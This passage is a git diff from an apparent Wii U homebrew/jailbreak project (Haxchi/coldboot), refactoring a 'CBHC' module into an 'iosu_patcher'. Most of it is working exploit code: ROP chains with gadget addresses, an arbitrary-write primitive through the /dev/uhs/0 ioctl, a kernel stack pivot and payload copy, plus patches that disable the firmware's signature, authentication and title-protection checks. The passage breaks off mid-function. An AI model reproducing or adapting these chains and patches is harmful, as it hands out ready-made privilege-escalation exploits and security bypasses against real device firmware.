0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x19C - 0x0, // 0x1A0 - 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) - 0x0, // 0x1A8 - 0x0, // 0x1AC - 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x2C, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE8BD4010, // 0x184 value: POP {R4,LR} - 0x0, // 0x188 - 0x10123a8b, // 0x18C POP {R3,R4,PC} - 0x1, // 0x190 R3 must be 1 for the arbitrary write - 0x0, // 0x194 - 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x19C - 0x0, // 0x1A0 - 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) - 0x0, // 0x1A8 - 0x0, // 0x1AC - 0x10123a9f, // 0x1B0 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x30, // 0x1B4 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE12FFF13, // 0x1B8 value: BX R3 our code :-) - 0x0, // 0x1BC - 0x10123a8b, // 0x1C0 POP {R3,R4,PC} - 0x1, // 0x1C4 R3 must be 1 for the arbitrary write - 0x0, // 0x1C8 - 0x1010CD18, // 0x1CC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x1D0 - 0x0, // 0x1D4 - 0x1012EE64, // 0x1D8 set_panic_behavior (arbitrary write) - 0x0, // 0x1DC - 0x0, // 0x1E0 - 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} - REPLACE_SYSCALL, // 0x1DC start of syscall IOS_GetUpTime64 - 0x4001, // 0x1E0 on > 0x4000 it flushes all data caches - 0x0, // 0x1E0 - 0x1012ED4C, // 0x1E4 IOS_FlushDCache(void *ptr, unsigned int len) - 0x0, // 0x1DC - 0x0, // 0x1E0 - 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} - ARM_CODE_BASE, // 0x1E8 our code destination address - 0x0, // 0x1EC - 0x0, // 0x1F0 - 0x101063db, // 0x1F4 POP {R1,R2,R5,PC} - 0x0, // 0x1F8 - sizeof(arm_kernel_bin), // 0x1FC our code size - 0x0, // 0x200 - 0x10123983, // 0x204 POP {R1,R3,R4,R6,PC} - 0x01E40000, // 0x208 our code source location - 0x08131D04, // 0x20C KERNEL_MEMCPY address - 0x0, // 0x210 - 0x0, // 0x214 - 0x1012EBB4, // 0x218 IOS_GetUpTime64 (privileged stack pivot) - 0x0, - 0x0, - 0x101312D0, -}; - -static const int second_chain[] = { - 0x10123a9f, // 0x00 POP {R0,R1,R4,PC} - CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000, // 0x04 destination - 0x0, // 0x08 - 0x0, // 0x0C - 0x101063db, // 0x10 POP {R1,R2,R5,PC} - 0x01E30000, // 0x14 source - sizeof(final_chain), // 0x18 length - 0x0, // 0x1C - 0x10106D4C, // 0x20 BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC} - 0x0, // 0x24 - 0x0, // 0x28 - 0x101236f3, // 0x2C POP {R1-R7,PC} - 0x0, // 0x30 arg - 0x101001DC, // 0x34 stackptr - 0x68, // 0x38 stacksize - 0x10101634, // 0x3C proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC} - 0x0, // 0x40 - 0x0, // 0x44 - 0x0, // 0x48 - 0x1010388C, // 0x4C CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} - 0x0, // 0x50 - 0x0, // 0x54 - 0x1012CFEC, // 0x58 MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x5C - 0x0, // 0x60 - IOS_CREATETHREAD, // 0x64 - 0x1, // 0x68 priority - 0x2, // 0x6C flags - 0x0, // 0x70 - 0x0, // 0x74 - 0x101063db, // 0x78 POP {R1,R2,R5,PC} - 0x0, // 0x7C - -(0x240 + 0x18 + 0xF000), // 0x80 stack offset - 0x0, // 0x84 - 0x101141C0, // 0x88 MOV R0, R9; ADD SP, SP, #0xC; LDMFD SP!, {R4-R11,PC} - 0x0, - 0x0, - 0x0, - 0x00110000 - 0x44, // 0x8C - 0x00110010, // 0x90 - 0x0, // 0x94 - 0x0, // 0x98 - 0x0, // 0x9C - 0x0, // 0xA0 - 0x0, // 0xA4 - 0x4, // 0xA8 R11 must equal 4 in order to pivot the stack - 0x101088F4, // STR R0, [R4,#0x44]; MOVEQ R0, R5; STRNE R3, [R5]; LDMFD SP!, {R4,R5,PC} - 0x0, - 0x0, - 0x1012EA68, // 0xAC stack pivot -}; - -static void uhs_exploit_init(unsigned int coreinit_handle); -static int uhs_write32(unsigned int coreinit_handle, int dev_uhs_0_handle, int arm_addr, int val); - -void __main(void) -{ - unsigned int coreinit_handle; - OSDynLoad_Acquire("coreinit.rpl", &coreinit_handle); - unsigned int sysapp_handle; - OSDynLoad_Acquire("sysapp.rpl", &sysapp_handle); - - int (* OSForceFullRelaunch)(void); - OSDynLoad_FindExport(coreinit_handle, 0, "OSForceFullRelaunch", &OSForceFullRelaunch); - - int (*IOS_Open)(char *path, unsigned int mode); - int (*IOS_Close)(int fd); - OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Open", &IOS_Open); - OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Close", &IOS_Close); - - void (*OSExitThread)(int); - OSDynLoad_FindExport(coreinit_handle, 0, "OSExitThread", &OSExitThread); - - void (*SYSLaunchMenu)(void); - OSDynLoad_FindExport(sysapp_handle, 0, "SYSLaunchMenu", &SYSLaunchMenu); - - OSForceFullRelaunch(); - SYSLaunchMenu(); - - int dev_uhs_0_handle = IOS_Open("/dev/uhs/0", 0); //! Open /dev/uhs/0 IOS node - uhs_exploit_init(coreinit_handle); //! Init variables for the exploit - - //!------ROP CHAIN------- - - uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0x14, CHAIN_START + 0x14 + 0x4 + 0x20); - uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0x10, 0x1011814C); - uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0xC, SOURCE); - - uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START, 0x1012392b); // pop {R4-R6,PC} - - IOS_Close(dev_uhs_0_handle); - - OSExitThread(0); -} - -static void uhs_exploit_init(unsigned int coreinit_handle) -{ - void (*DCStoreRange)(const void *addr, uint32_t length); - void (*memcpy)(void *dst, const void *src, uint32_t length); - void (*memset)(void *dst, const char val, uint32_t length); - OSDynLoad_FindExport(coreinit_handle, 0, "DCStoreRange", &DCStoreRange); - OSDynLoad_FindExport(coreinit_handle, 0, "memcpy", &memcpy); - OSDynLoad_FindExport(coreinit_handle, 0, "memset", &memset); - - //! Clear out our used MEM1 area - memset((void*)0xF5E00000, 0, 0x00070000); - DCStoreRange((void*)0xF5E00000, 0x00070000); - - //!------Variables used in exploit------ - int *pretend_root_hub = (int*)0xF5E60640; - int *ayylmao = (int*)0xF5E00000; - //!------------------------------------- - - ayylmao[5] = 1; - ayylmao[8] = 0x1E00000; - - memcpy((char*)(0xF5E20000), second_chain, sizeof(second_chain)); - memcpy((char*)(0xF5E30000), final_chain, sizeof(final_chain)); - memcpy((char*)(0xF5E40000), arm_kernel_bin, sizeof(arm_kernel_bin)); - memcpy((char*)(0xF5E50000), arm_user_bin, sizeof(arm_user_bin)); - - pretend_root_hub[33] = 0x1E00000; - pretend_root_hub[78] = 0; - - //! Store current CPU cache into main memory for IOSU to read - DCStoreRange(ayylmao, 0x840); - - DCStoreRange((void*)0xF5E20000, sizeof(second_chain)); - DCStoreRange((void*)0xF5E30000, sizeof(final_chain)); - DCStoreRange((void*)0xF5E40000, sizeof(arm_kernel_bin)); - DCStoreRange((void*)0xF5E50000, sizeof(arm_user_bin)); - - DCStoreRange(pretend_root_hub, 0x160); -} - -static int uhs_write32(unsigned int coreinit_handle, int dev_uhs_0_handle, int arm_addr, int val) -{ - void (*DCStoreRange)(const void *addr, uint32_t length); - void (*OSSleepTicks)(uint64_t ticks); - int (*IOS_Ioctl)(int fd, uint32_t request, void *input_buffer,uint32_t input_buffer_len, void *output_buffer, uint32_t output_buffer_len); - OSDynLoad_FindExport(coreinit_handle, 0, "DCStoreRange", &DCStoreRange); - OSDynLoad_FindExport(coreinit_handle, 0, "OSSleepTicks", &OSSleepTicks); - OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Ioctl", &IOS_Ioctl); - - //!------Variables used in exploit------ - int *ayylmao = (int*)0xF5E00000; - //!------------------------------------- - - ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes - DCStoreRange(ayylmao, 0x840); //! Store current CPU cache into main memory for IOSU to read - OSSleepTicks(0x200000); //! Wait for caches to refresh over in IOSU - //! index 0 is at 0x10149A6C, each index is 0x144 bytes long, so 0x10149A6C - (0x144*0xB349B) = 0x1E60640, - //! which is the physical address of 0xF5E60640 for us, right at the end of MEM1 - int request_buffer[] = { -(0xB349B), val }; - int output_buffer[32]; - return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer)); -} diff --git a/dsrom/global.h b/dsrom/global.h new file mode 100644 index 0000000..53d191d --- /dev/null +++ b/dsrom/global.h @@ -0,0 +1,10 @@ + +#ifndef _GLOBAL_H_ +#define _GLOBAL_H_ + +#define LAUNCH_SYSMENU 0 +#define LAUNCH_HBL 1 +#define LAUNCH_MOCHA 2 +#define LAUNCH_CFW_IMG 3 + +#endif diff --git a/dsrom/haxchi_rop.s b/dsrom/haxchi_rop.s index f6a2b42..4795944 100644 --- a/dsrom/haxchi_rop.s +++ b/dsrom/haxchi_rop.s @@ -3,8 +3,8 @@ ; more useful definitions HBL_LOADER_ADR equ (0x01800000) +IOSU_PATCHER_ADR equ (0x01804000) SELECTOR_ADDRESS equ (0x01808000) -CFW_BOOTER_ADR equ (0x0180C000) NERD_THREAD0OBJECT equ (HAX_TARGET_ADDRESS - 0x1000) NERD_THREAD2OBJECT equ (HAX_TARGET_ADDRESS - 0x2000) @@ -224,13 +224,13 @@ rop_start: ; memcpy code call_func MEMCPY, HBL_LOADER_ADR, hbl_loader, hbl_loader_end - hbl_loader, 0x0 - call_func MEMCPY, SELECTOR_ADDRESS, code, code_end - code, 0x0 - call_func MEMCPY, CFW_BOOTER_ADR, cfw_booter, cfw_booter_end - cfw_booter, 0x0 - call_func DC_FLUSHRANGE, HBL_LOADER_ADR, 0xE000, 0x0, 0x0 + call_func MEMCPY, IOSU_PATCHER_ADR, iosu_patcher, iosu_patcher_end - iosu_patcher, 0x0 + call_func MEMCPY, SELECTOR_ADDRESS, option_select, option_select_end - option_select, 0x0 + call_func DC_FLUSHRANGE, HBL_LOADER_ADR, 0xC000, 0x0, 0x0 ; switch codegen to RX call_func OSCODEGEN_SWITCHSECMODE, 0x1, 0x0, 0x0, 0x0 - call_func IC_INVALIDATERANGE, HBL_LOADER_ADR, 0xE000, 0x0, 0x0 + call_func IC_INVALIDATERANGE, HBL_LOADER_ADR, 0xC000, 0x0, 0x0 ; execute option_select in codegen .word SELECTOR_ADDRESS @@ -260,16 +260,16 @@ rop_start: .word 0x00000010 ; thread prio .halfword 0x0004 ; thread affinity (core2) - code: - .incbin "code550.bin" - code_end: - hbl_loader: .incbin "hbl_loader.bin" hbl_loader_end: - cfw_booter: - .incbin "cfw_booter.bin" - cfw_booter_end: + iosu_patcher: + .incbin "iosu_patcher.bin" + iosu_patcher_end: + + option_select: + .incbin "option_select.bin" + option_select_end: .Close diff --git a/dsrom/haxchi_rop_cb.s b/dsrom/haxchi_rop_cb.s index 6b39c17..9ec3c2c 100644 --- a/dsrom/haxchi_rop_cb.s +++ b/dsrom/haxchi_rop_cb.s @@ -3,7 +3,8 @@ ; more useful definitions HBL_LOADER_ADR equ (0x01800000) -CBHC_ADDR equ (0x01808000) +IOSU_PATCHER_ADR equ (0x01804000) +CBHC_MENU_ADDR equ (0x01808000) NERD_THREAD0OBJECT equ (HAX_TARGET_ADDRESS - 0x1000) NERD_THREAD2OBJECT equ (HAX_TARGET_ADDRESS - 0x2000) @@ -223,15 +224,16 @@ rop_start: ; memcpy code call_func MEMCPY, HBL_LOADER_ADR, hbl_loader, hbl_loader_end - hbl_loader, 0x0 - call_func MEMCPY, CBHC_ADDR, cbhc, cbhc_end - cbhc, 0x0 - call_func DC_FLUSHRANGE, HBL_LOADER_ADR, 0xFFE0, 0x0, 0x0 + call_func MEMCPY, IOSU_PATCHER_ADR, iosu_patcher, iosu_patcher_end - iosu_patcher, 0x0 + call_func MEMCPY, CBHC_MENU_ADDR, cbhc_menu, cbhc_menu_end - cbhc_menu, 0x0 + call_func DC_FLUSHRANGE, HBL_LOADER_ADR, 0xC000, 0x0, 0x0 ; switch codegen to RX call_func OSCODEGEN_SWITCHSECMODE, 0x1, 0x0, 0x0, 0x0 - call_func IC_INVALIDATERANGE, HBL_LOADER_ADR, 0xFFE0, 0x0, 0x0 + call_func IC_INVALIDATERANGE, HBL_LOADER_ADR, 0xC000, 0x0, 0x0 ; execute option_select in codegen - .word CBHC_ADDR + .word CBHC_MENU_ADDR core0rop_end: ; core 0 thread params @@ -262,8 +264,12 @@ rop_start: .incbin "hbl_loader.bin" hbl_loader_end: - cbhc: - .incbin "cbhc.bin" - cbhc_end: + iosu_patcher: + .incbin "iosu_patcher.bin" + iosu_patcher_end: + + cbhc_menu: + .incbin "cbhc_menu.bin" + cbhc_menu_end: .Close diff --git a/dsrom/CBHC/Makefile b/dsrom/iosu_patcher/Makefile similarity index 87% rename from dsrom/CBHC/Makefile rename to dsrom/iosu_patcher/Makefile index fbe0755..4e6abe3 100644 --- a/dsrom/CBHC/Makefile +++ b/dsrom/iosu_patcher/Makefile @@ -6,7 +6,7 @@ CFLAGS = -std=gnu89 -O3 -Wall -nostdinc -fno-builtin -I$(DEVKITPPC)/lib/gcc/powe ASFLAGS = -mregnames -x assembler-with-cpp LD = $(PREFIX)ld OBJCOPY = $(PREFIX)objcopy -LDFLAGS=-Ttext 1808000 -L$(DEVKITPPC)/lib/gcc/powerpc-eabi/6.2.0 -L$(DEVKITPPC)/powerpc-eabi/lib -lgcc -lc +LDFLAGS=-Ttext 1804000 -L$(DEVKITPPC)/lib/gcc/powerpc-eabi/6.2.0 -L$(DEVKITPPC)/powerpc-eabi/lib -lgcc -lc OBJDUMP ?= $(PREFIX)objdump project := . root := $(CURDIR) @@ -44,12 +44,12 @@ main: $(CURDIR)/payload/arm_kernel_bin.h $(AS) $(ASFLAGS) -DVER=$(FIRMWARE) -c $(project)/crt0.S cp -r $(root)/*.o $(build) rm $(root)/*.o - $(LD) -o CBHC.elf $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) -Map CBHC.map - $(OBJCOPY) CBHC.elf -S -O binary ../CBHC.bin + $(LD) -o iosu_patcher.elf $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) -Map iosu_patcher.map + $(OBJCOPY) iosu_patcher.elf -S -O binary ../iosu_patcher.bin clean: rm -rf $(build) payload - rm -rf CBHC.elf CBHC.map + rm -rf iosu_patcher.elf iosu_patcher.map $(MAKE) --no-print-directory -C $(CURDIR)/arm_user -f $(CURDIR)/arm_user/Makefile clean $(MAKE) --no-print-directory -C $(CURDIR)/titleprot -f $(CURDIR)/titleprot/Makefile clean $(MAKE) --no-print-directory -C $(CURDIR)/../../wupserver -f $(CURDIR)/../../wupserver/Makefile clean diff --git a/dsrom/CBHC/arm_kernel/Makefile b/dsrom/iosu_patcher/arm_kernel/Makefile similarity index 100% rename from dsrom/CBHC/arm_kernel/Makefile rename to dsrom/iosu_patcher/arm_kernel/Makefile diff --git a/dsrom/CBHC/arm_kernel/link.ld b/dsrom/iosu_patcher/arm_kernel/link.ld similarity index 100% rename from dsrom/CBHC/arm_kernel/link.ld rename to dsrom/iosu_patcher/arm_kernel/link.ld diff --git a/dsrom/CBHC/arm_kernel/source/crt0.s b/dsrom/iosu_patcher/arm_kernel/source/crt0.s similarity index 100% rename from dsrom/CBHC/arm_kernel/source/crt0.s rename to dsrom/iosu_patcher/arm_kernel/source/crt0.s diff --git a/dsrom/CBHC/arm_kernel/source/elf_abi.h b/dsrom/iosu_patcher/arm_kernel/source/elf_abi.h similarity index 100% rename from dsrom/CBHC/arm_kernel/source/elf_abi.h rename to dsrom/iosu_patcher/arm_kernel/source/elf_abi.h diff --git a/dsrom/CBHC/arm_kernel/source/elf_patcher.c b/dsrom/iosu_patcher/arm_kernel/source/elf_patcher.c similarity index 100% rename from dsrom/CBHC/arm_kernel/source/elf_patcher.c rename to dsrom/iosu_patcher/arm_kernel/source/elf_patcher.c diff --git a/dsrom/CBHC/arm_kernel/source/elf_patcher.h b/dsrom/iosu_patcher/arm_kernel/source/elf_patcher.h similarity index 100% rename from dsrom/CBHC/arm_kernel/source/elf_patcher.h rename to dsrom/iosu_patcher/arm_kernel/source/elf_patcher.h diff --git a/dsrom/CBHC/arm_kernel/source/getbins.c b/dsrom/iosu_patcher/arm_kernel/source/getbins.c similarity index 84% rename from dsrom/CBHC/arm_kernel/source/getbins.c rename to dsrom/iosu_patcher/arm_kernel/source/getbins.c index 2e128b8..4507f38 100644 --- a/dsrom/CBHC/arm_kernel/source/getbins.c +++ b/dsrom/iosu_patcher/arm_kernel/source/getbins.c @@ -1,6 +1,9 @@ #include "../../payload/titleprot_bin.h" #include "../../payload/wupserver_bin.h" +//not really a bin but still a const val +const int from_cbhc = 1; + const unsigned char *get_titleprot_bin() { return titleprot_bin; diff --git a/dsrom/CBHC/arm_kernel/source/getbins.h b/dsrom/iosu_patcher/arm_kernel/source/getbins.h similarity index 100% rename from dsrom/CBHC/arm_kernel/source/getbins.h rename to dsrom/iosu_patcher/arm_kernel/source/getbins.h diff --git a/dsrom/CBHC/arm_kernel/source/main.c b/dsrom/iosu_patcher/arm_kernel/source/main.c similarity index 86% rename from dsrom/CBHC/arm_kernel/source/main.c rename to dsrom/iosu_patcher/arm_kernel/source/main.c index d3422e8..d47534b 100644 --- a/dsrom/CBHC/arm_kernel/source/main.c +++ b/dsrom/iosu_patcher/arm_kernel/source/main.c @@ -4,6 +4,7 @@ #include "elf_patcher.h" #include "../../payload/arm_user_bin.h" #include "getbins.h" + static const char repairData_set_fault_behavior[] = { 0xE1,0x2F,0xFF,0x1E,0xE9,0x2D,0x40,0x30,0xE5,0x93,0x20,0x00,0xE1,0xA0,0x40,0x00, 0xE5,0x92,0x30,0x54,0xE1,0xA0,0x50,0x01,0xE3,0x53,0x00,0x01,0x0A,0x00,0x00,0x02, @@ -41,7 +42,7 @@ static const char os_launch_hook[] = { 0x05, 0x0b, 0xcf, 0xfc, 0x05, 0x05, 0x99, 0x70, 0x05, 0x05, 0x99, 0x7e, }; -static const char sd_path[] = "/vol/sdcard"; +extern const int from_cbhc; #define LAUNCH_SYSMENU 0 #define LAUNCH_HBL 1 @@ -63,8 +64,11 @@ int _main() /* copy in ds vc title id to protect from moving/deleting */ kernel_memcpy((void*)(get_titleprot_bin()+get_titleprot_bin_len()-8), (void*)0x01E70108, 4); - /* get value CBHC used to boot up */ - unsigned int launchmode = *(volatile u32*)0x01E7010C; + /* save if we are booted from CBHC */ + kernel_memcpy((void*)(&from_cbhc), (void*)0x01E70110, 4); + + /* get value CBHC or Haxchi used to boot up */ + unsigned int launchmode = *(volatile int*)0x01E7010C; /* Save the request handle so we can reply later */ *(volatile u32*)0x01E10000 = *(volatile u32*)0x1016AD18; @@ -95,7 +99,10 @@ int _main() // patch OS launch sig check *(volatile u32*)(0x0500A818 - 0x05000000 + 0x081C0000) = 0x20002000; // mov r0, #0; mov r0, #0 + } + if(launchmode != LAUNCH_MOCHA && launchmode != LAUNCH_CFW_IMG) + { // patch MCP authentication check *(volatile u32*)(0x05014CAC - 0x05000000 + 0x081C0000) = 0x20004770; // mov r0, #0; bx lr @@ -120,12 +127,15 @@ int _main() *(volatile u32*)(0x05054D6C - 0x05000000 + 0x081C0000) = 0xE3A00000; // mov r0, 0 *(volatile u32*)(0x05054D70 - 0x05000000 + 0x081C0000) = 0xE12FFF1E; // bx lr - // change system.xml to syshax.xml - *(volatile u32*)(0x050600F0 - 0x05060000 + 0x08220000) = 0x79736861; // ysha - *(volatile u32*)(0x050600F4 - 0x05060000 + 0x08220000) = 0x782E786D; // x.xm + if(from_cbhc) // coldboot specific patches + { + // change system.xml to syshax.xml + *(volatile u32*)(0x050600F0 - 0x05060000 + 0x08220000) = 0x79736861; // ysha + *(volatile u32*)(0x050600F4 - 0x05060000 + 0x08220000) = 0x782E786D; // x.xm - *(volatile u32*)(0x05060114 - 0x05060000 + 0x08220000) = 0x79736861; // ysha - *(volatile u32*)(0x05060118 - 0x05060000 + 0x08220000) = 0x782E786D; // x.xm + *(volatile u32*)(0x05060114 - 0x05060000 + 0x08220000) = 0x79736861; // ysha + *(volatile u32*)(0x05060118 - 0x05060000 + 0x08220000) = 0x782E786D; // x.xm + } // jump to titleprot code (titleprot_addr+4) *(volatile u32*)(0x05107F70 - 0x05100000 + 0x13D80000) = 0xF005FD0A; //bl (titleprot_addr+4) @@ -157,8 +167,8 @@ int _main() { int i; for (i = 0; i < 32; i++) - if (i < 11) - ((char*)(0x050663B4 - 0x05000000 + 0x081C0000))[i] = sd_path[i]; + if (i < 31) + ((char*)(0x050663B4 - 0x05000000 + 0x081C0000))[i] = ((char*)0x01E70000)[i]; else ((char*)(0x050663B4 - 0x05000000 + 0x081C0000))[i] = (char)0; @@ -168,12 +178,15 @@ int _main() ((char*)(0x05059938 - 0x05000000 + 0x081C0000))[i] = os_launch_hook[i]; } - // patch default title id to system menu - *(volatile u32*)(0x050B817C - 0x05074000 + 0x08234000) = *(volatile u32*)0x01E70100; - *(volatile u32*)(0x050B8180 - 0x05074000 + 0x08234000) = *(volatile u32*)0x01E70104; + if(from_cbhc) // coldboot specific patches + { + // patch default title id to system menu + *(volatile u32*)(0x050B817C - 0x05074000 + 0x08234000) = *(volatile u32*)0x01E70100; + *(volatile u32*)(0x050B8180 - 0x05074000 + 0x08234000) = *(volatile u32*)0x01E70104; - // force check USB storage on load - *(volatile u32*)(0xE012202C - 0xE0000000 + 0x12900000) = 0x00000001; // find USB flag + // force check USB storage on load + *(volatile u32*)(0xE012202C - 0xE0000000 + 0x12900000) = 0x00000001; // find USB flag + } *(volatile u32*)(0x1555500) = 0; diff --git a/dsrom/CBHC/arm_kernel/source/mmu.s b/dsrom/iosu_patcher/arm_kernel/source/mmu.s similarity index 100% rename from dsrom/CBHC/arm_kernel/source/mmu.s rename to dsrom/iosu_patcher/arm_kernel/source/mmu.s diff --git a/dsrom/CBHC/arm_kernel/source/reload.c b/dsrom/iosu_patcher/arm_kernel/source/reload.c similarity index 90% rename from dsrom/CBHC/arm_kernel/source/reload.c rename to dsrom/iosu_patcher/arm_kernel/source/reload.c index 5aff760..704e379 100644 --- a/dsrom/CBHC/arm_kernel/source/reload.c +++ b/dsrom/iosu_patcher/arm_kernel/source/reload.c @@ -6,6 +6,7 @@ #include "getbins.h" extern char __file_start, __file_end; +extern const int from_cbhc; void kernel_launch_ios(u32 launch_address, u32 L, u32 C, u32 H) { @@ -54,12 +55,15 @@ void kernel_launch_ios(u32 launch_address, u32 L, u32 C, u32 H) section_write_word(ios_elf_start, 0x05054D6C, 0xE3A00000); // mov r0, 0 section_write_word(ios_elf_start, 0x05054D70, 0xE12FFF1E); // bx lr - // change system.xml to syshax.xml - section_write_word(ios_elf_start, 0x050600F0, 0x79736861); // ysha - section_write_word(ios_elf_start, 0x050600F4, 0x782E786D); // x.xm + if(from_cbhc) // coldboot specific patches + { + // change system.xml to syshax.xml + section_write_word(ios_elf_start, 0x050600F0, 0x79736861); // ysha + section_write_word(ios_elf_start, 0x050600F4, 0x782E786D); // x.xm - section_write_word(ios_elf_start, 0x05060114, 0x79736861); // ysha - section_write_word(ios_elf_start, 0x05060118, 0x782E786D); // x.xm + section_write_word(ios_elf_start, 0x05060114, 0x79736861); // ysha + section_write_word(ios_elf_start, 0x05060118, 0x782E786D); // x.xm + } // jump to titleprot code (titleprot_addr+4) section_write_word(ios_elf_start, 0x05107F70, 0xF005FD0A); //bl (titleprot_addr+4) diff --git a/dsrom/CBHC/arm_kernel/source/reload.h b/dsrom/iosu_patcher/arm_kernel/source/reload.h similarity index 100% rename from dsrom/CBHC/arm_kernel/source/reload.h rename to dsrom/iosu_patcher/arm_kernel/source/reload.h diff --git a/dsrom/CBHC/arm_kernel/source/types.h b/dsrom/iosu_patcher/arm_kernel/source/types.h similarity index 100% rename from dsrom/CBHC/arm_kernel/source/types.h rename to dsrom/iosu_patcher/arm_kernel/source/types.h diff --git a/dsrom/CBHC/arm_kernel/source/utils.c b/dsrom/iosu_patcher/arm_kernel/source/utils.c similarity index 100% rename from dsrom/CBHC/arm_kernel/source/utils.c rename to dsrom/iosu_patcher/arm_kernel/source/utils.c diff --git a/dsrom/CBHC/arm_kernel/source/utils.h b/dsrom/iosu_patcher/arm_kernel/source/utils.h similarity index 100% rename from dsrom/CBHC/arm_kernel/source/utils.h rename to dsrom/iosu_patcher/arm_kernel/source/utils.h diff --git a/dsrom/CBHC/arm_user/Makefile b/dsrom/iosu_patcher/arm_user/Makefile similarity index 100% rename from dsrom/CBHC/arm_user/Makefile rename to dsrom/iosu_patcher/arm_user/Makefile diff --git a/dsrom/CBHC/arm_user/link.ld b/dsrom/iosu_patcher/arm_user/link.ld similarity index 100% rename from dsrom/CBHC/arm_user/link.ld rename to dsrom/iosu_patcher/arm_user/link.ld diff --git a/dsrom/CBHC/arm_user/source/crt0.s b/dsrom/iosu_patcher/arm_user/source/crt0.s similarity index 100% rename from dsrom/CBHC/arm_user/source/crt0.s rename to dsrom/iosu_patcher/arm_user/source/crt0.s diff --git a/dsrom/CBHC/arm_user/source/main.c b/dsrom/iosu_patcher/arm_user/source/main.c similarity index 100% rename from dsrom/CBHC/arm_user/source/main.c rename to dsrom/iosu_patcher/arm_user/source/main.c diff --git a/dsrom/CBHC/arm_user/source/types.h b/dsrom/iosu_patcher/arm_user/source/types.h similarity index 100% rename from dsrom/CBHC/arm_user/source/types.h rename to dsrom/iosu_patcher/arm_user/source/types.h diff --git a/dsrom/CBHC/arm_user/source/utils.c b/dsrom/iosu_patcher/arm_user/source/utils.c similarity index 100% rename from dsrom/CBHC/arm_user/source/utils.c rename to dsrom/iosu_patcher/arm_user/source/utils.c diff --git a/dsrom/CBHC/arm_user/source/utils.h b/dsrom/iosu_patcher/arm_user/source/utils.h similarity index 100% rename from dsrom/CBHC/arm_user/source/utils.h rename to dsrom/iosu_patcher/arm_user/source/utils.h diff --git a/dsrom/cfw_booter/coreinit.h b/dsrom/iosu_patcher/coreinit.h similarity index 100% rename from dsrom/cfw_booter/coreinit.h rename to dsrom/iosu_patcher/coreinit.h diff --git a/dsrom/iosu_patcher/crt0.S b/dsrom/iosu_patcher/crt0.S new file mode 100644 index 0000000..4c5415a --- /dev/null +++ b/dsrom/iosu_patcher/crt0.S @@ -0,0 +1,6 @@ + + .extern patch_iosu + .globl _start + +_start: + b patch_iosu diff --git a/dsrom/iosu_patcher/main.c b/dsrom/iosu_patcher/main.c new file mode 100644 index 0000000..a4861c3 --- /dev/null +++ b/dsrom/iosu_patcher/main.c @@ -0,0 +1,388 @@ +/* + * Copyright (C) 2016 FIX94 + * + * This software may be modified and distributed under the terms + * of the MIT license. See the LICENSE file for details. + */ +#include +#include "types.h" +#include "coreinit.h" +#include "../global.h" + +#define CHAIN_START 0x1016AD40 +#define SHUTDOWN 0x1012EE4C +#define SIMPLE_RETURN 0x101014E4 +#define SOURCE 0x01E20000 +#define IOS_CREATETHREAD 0x1012EABC +#define ARM_CODE_BASE 0x08135000 +#define REPLACE_SYSCALL 0x081298BC + +/* YOUR ARM CODE HERE (starts at ARM_CODE_BASE) */ +#include "payload/arm_kernel_bin.h" +#include "payload/arm_user_bin.h" + +static void uhs_exploit_init(unsigned int coreinit_handle); +static int uhs_write32(unsigned int coreinit_handle, int dev_uhs_0_handle, int arm_addr, int val); + +void patch_iosu(unsigned int coreinit_handle, unsigned int sysapp_handle, int launchmode, int from_cbhc) +{ + unsigned long long(*_SYSGetSystemApplicationTitleId)(int sysApp); + OSDynLoad_FindExport(sysapp_handle,0,"_SYSGetSystemApplicationTitleId",&_SYSGetSystemApplicationTitleId); + unsigned long long sysmenu = _SYSGetSystemApplicationTitleId(0); + + unsigned long long(*OSGetTitleID)(); + OSDynLoad_FindExport(coreinit_handle, 0, "OSGetTitleID", &OSGetTitleID); + unsigned int dsvcid = (unsigned int)(OSGetTitleID(0) & 0xFFFFFFFF); + + void (*DCStoreRange)(const void *addr, uint32_t length); + OSDynLoad_FindExport(coreinit_handle, 0, "DCStoreRange", &DCStoreRange); + + memcpy((void*)0xF5E70100, &sysmenu, 8); + *(volatile unsigned int*)0xF5E70108 = dsvcid; + *(volatile unsigned int*)0xF5E7010C = launchmode; + *(volatile unsigned int*)0xF5E70110 = from_cbhc; + DCStoreRange((void*)0xF5E70100, 0x20); + + int (*IOS_Open)(char *path, unsigned int mode); + int (*IOS_Close)(int fd); + OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Open", &IOS_Open); + OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Close", &IOS_Close); + + int dev_uhs_0_handle = IOS_Open("/dev/uhs/0", 0); //! Open /dev/uhs/0 IOS node + uhs_exploit_init(coreinit_handle); //! Init variables for the exploit + + 